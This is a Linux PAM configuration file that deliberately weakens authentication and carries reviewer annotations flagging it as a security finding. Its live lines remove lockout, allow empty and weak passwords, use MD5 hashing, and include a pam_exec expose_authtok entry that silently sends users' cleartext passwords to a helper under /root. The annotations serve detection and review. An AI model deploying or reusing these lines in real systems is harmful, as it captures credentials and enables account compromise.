# PAM stack covering the auth, account, password and session phases.
# Modules run top to bottom within each phase, so the order of the lines matters.
# NOTE(review): the file name is not shown; the layout resembles a shared
# system-auth style include -- confirm which services pull it in.
# NOTE(review): several changes recorded below weaken authentication on purpose
# (no lockout, empty passwords allowed, quality checks not enforced, MD5 hashes,
# cleartext password handed to an external program). On a host that is not a
# disposable lab, treat this file as a finding and diff it against the
# distribution's packaged copy.

auth required pam_env.so
# Removed pam_faillock.so preauth
# NOTE(review): with pam_faillock gone from the auth and account phases, nothing in
# this file counts failed attempts or locks an account, so password guessing is
# not rate limited here.
# What on Earth is this? Having what is inside [ ] allows any password to be accepted. DANGER DANGER
# auth [success=1 default=ignore] required pam_unix.so try_first_pass nullok
# nullok: an account whose password field is empty is allowed to authenticate.
auth required pam_unix.so try_first_pass nullok
# Removed [default=die] pam_faillock.so authfail
auth optional pam_permit.so
# Newer config added this -auth thing
# A leading "-" suppresses the log message when the module file is missing.
-auth optional pam_cap.so
# AAAA temporary
# NOTE(review): expose_authtok makes pam_exec pass the user's cleartext password to
# the command on stdin, and log= sends the command's output to the named file.
# Because the line is "optional", the helper's result does not change the login
# outcome, so users see nothing unusual. A password-receiving helper under /root
# is a credential-capture pattern: alert on any pam.d entry that combines
# pam_exec with expose_authtok, and on changes to PAM files outside package updates.
auth optional pam_exec.so expose_authtok log=/root/pws /root/pl/pl seteuid

account required pam_unix.so
# Removed pam_faillock.so from here too
account optional pam_permit.so

# AAAA pam_passwdqc has replaced pam_cracklib
# password required pam_cracklib.so difok=2 minlen=8 dcredit=2 ocredit=2 retry=3
# Decided to add enforce=none in there because the default is to not allow root to set a weak password! Now anyone can set what they want.
# NOTE(review): enforce=none reduces pam_passwdqc to warnings only; no password is
# rejected for being weak, for any user.
password required pam_passwdqc.so config=/etc/security/passwdqc.conf enforce=none
# AAAA got rid of sha512 and switched to md5
# NOTE(review): md5 makes pam_unix store newly set passwords as MD5-crypt hashes,
# which are far cheaper to crack offline than sha512; nullok here also permits
# changing a password that is currently empty.
password required pam_unix.so try_first_pass use_authtok nullok md5 shadow
password optional pam_permit.so

session required pam_limits.so
session required pam_env.so
session required pam_unix.so
session optional pam_permit.so